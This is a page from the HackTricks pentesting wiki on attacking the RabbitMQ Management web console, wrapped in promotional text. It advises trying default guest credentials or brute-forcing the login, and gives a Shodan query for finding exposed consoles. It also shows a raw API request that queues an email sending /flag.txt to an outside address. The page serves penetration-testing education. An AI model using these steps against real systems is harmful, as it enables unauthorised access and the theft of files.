3.8 KiB

Raw Blame History

Support HackTricks and get benefits!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

Discover The PEASS Family, our collection of exclusive NFTs

Get the official PEASS & HackTricks swag

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo.

15672 - Pentesting RabbitMQ Management

Basic Information

You can learn more about RabbitMQ in 5671,5672 - Pentesting AMQP.
In this port you may find the RabbitMQ Management web console if the management plugin is enabled.
The main page should looks like this:

Enumeration

The default credentials are "guest":"guest". If they aren't working you may try to brute-force the login.

To manually start this module you need to execute:

rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart

Once you have correctly authenticated you will see the admin console:

Also, if you have valid credentials you may find interesting the information of http://localhost:15672/api/connections

Note also that it's possible to publish data inside a queue using the API of this service with a request like:

POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267

{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}

Shodan

port:15672 http